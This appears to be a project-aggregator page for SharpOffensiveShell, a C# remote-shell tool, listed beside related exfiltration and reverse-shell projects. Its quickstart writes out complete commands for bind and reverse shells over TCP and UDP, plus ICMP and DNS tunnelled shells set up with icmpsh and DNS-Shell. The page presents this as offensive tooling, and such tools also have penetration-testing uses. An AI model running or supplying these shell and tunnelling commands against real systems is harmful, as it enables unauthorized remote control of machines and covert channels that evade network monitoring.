All Projects → darkr4y → SharpOffensiveShell

darkr4y / SharpOffensiveShell

Licence: other
A sort of simple shell which support multiple protocols.

Programming Languages

C#
18002 projects

Projects that are alternatives of or similar to SharpOffensiveShell

Pyexfil
A Python Package for Data Exfiltration
Stars: ✭ 554 (+680.28%)
Mutual labels:  dns, icmp
gost
GO Simple Tunnel - a simple tunnel written in golang
Stars: ✭ 154 (+116.9%)
Mutual labels:  dns
black-mirror
Automatically maintained malicious host blacklists and false-positive whitelists.
Stars: ✭ 41 (-42.25%)
Mutual labels:  dns
ebook
Third edition of the Computer Networking: Principles, Protocols and Practice ebook
Stars: ✭ 64 (-9.86%)
Mutual labels:  dns
dfex
DNS File EXfiltration
Stars: ✭ 46 (-35.21%)
Mutual labels:  dns
namecheapapi
Python Namecheap API wrapper. Supports domain registration/renewal/management, domain availability checks, DNS updates and more.
Stars: ✭ 22 (-69.01%)
Mutual labels:  dns
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (+94.37%)
Mutual labels:  reverse-shell
ansible-dnsmasq
Ansible role to set up Dnsmasq in Debian-like systems
Stars: ✭ 18 (-74.65%)
Mutual labels:  dns
zonemanager
Central DNS/DHCP database with replication to Amazon Route53, BIND, MikroTik routers and other services.
Stars: ✭ 29 (-59.15%)
Mutual labels:  dns
YouTube-Tutorials--Italian
📂 Source Code for (some of) the Programming Tutorials from my Italian YouTube Channel and website ProgrammareInPython.it. This is just a small portion of the content: please visit the website for more.
Stars: ✭ 28 (-60.56%)
Mutual labels:  reverse-shell
java-reverse-tcp
JAR, Java, and JSP shells that work on Linux OS, macOS, and Windows OS.
Stars: ✭ 19 (-73.24%)
Mutual labels:  reverse-shell
checkdmarc
A parser for SPF and DMARC DNS records
Stars: ✭ 124 (+74.65%)
Mutual labels:  dns
go-multiaddr-dns
Go library and CLI tool for /dns4, /dns6, /dnsaddr multiaddr resolution
Stars: ✭ 24 (-66.2%)
Mutual labels:  dns
RESTKnot
REST API for Knot Service
Stars: ✭ 15 (-78.87%)
Mutual labels:  dns
aiodns
A All-In-One DNS Solution written in Go
Stars: ✭ 23 (-67.61%)
Mutual labels:  dns
cfadmin
A lua web network framework.
Stars: ✭ 259 (+264.79%)
Mutual labels:  dns
AdGuard-WireGuard-Unbound-Cloudflare
The Ultimate Network Security Guide 🔒 Protection | 🔎 Privacy | 🚀 Performance on home network 24/7 🕛 Accessible anywhere 🌏
Stars: ✭ 160 (+125.35%)
Mutual labels:  dns
noddos
Noddos client
Stars: ✭ 78 (+9.86%)
Mutual labels:  dns
rsdns
rackspace DNS tools
Stars: ✭ 55 (-22.54%)
Mutual labels:  dns
ShellBot
An advanced reverse shell written in Python3.
Stars: ✭ 20 (-71.83%)
Mutual labels:  reverse-shell

SharpOffensiveShell

A sort of simple shell which support multiple protocols.

This project is just for improving my C# coding ability. The SharpOffsensiveShell DNS mode use the Native Windows API instead of the Nslookup command to perform DNS requests.

QuickStart

SharpOffsensiveShell support .NET Framework 2.0

csc SharpOffensiveShell.cs

TCP

For bind shell

sharpoffensiveshell.exe tcp listen 0.0.0.0 8080
ncat -v 1.1.1.1 8080

For reverse shell

ncat -lvp 8080
sharpoffensiveshell.exe tcp connect 1.1.1.1 8080

UDP

For bind shell

sharpoffensiveshell.exe tcp listen 0.0.0.0 8080
ncat -u -v 1.1.1.1 8080

For reverse shell

ncat -u -lvp 8080

When reverse connection accepted, type enter to make prompt display.

sharpoffensiveshell.exe tcp connect 1.1.1.1 8080

ICMP

git clone https://github.com/inquisb/icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP
sharpoffensiveshell.exe icmp connect listenIP

DNS

pip install dnslib
git clone https://github.com/sensepost/DNS-Shell

For direct mode

python DNS-Shell.py -l -d [Server IP]
sharpoffensiveshell.exe dns direct ServerIP Domain 

For recursive mode

DNS-Shell.py -l -r [Domain]
sharpoffensiveshell.exe dns recurse Domain
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].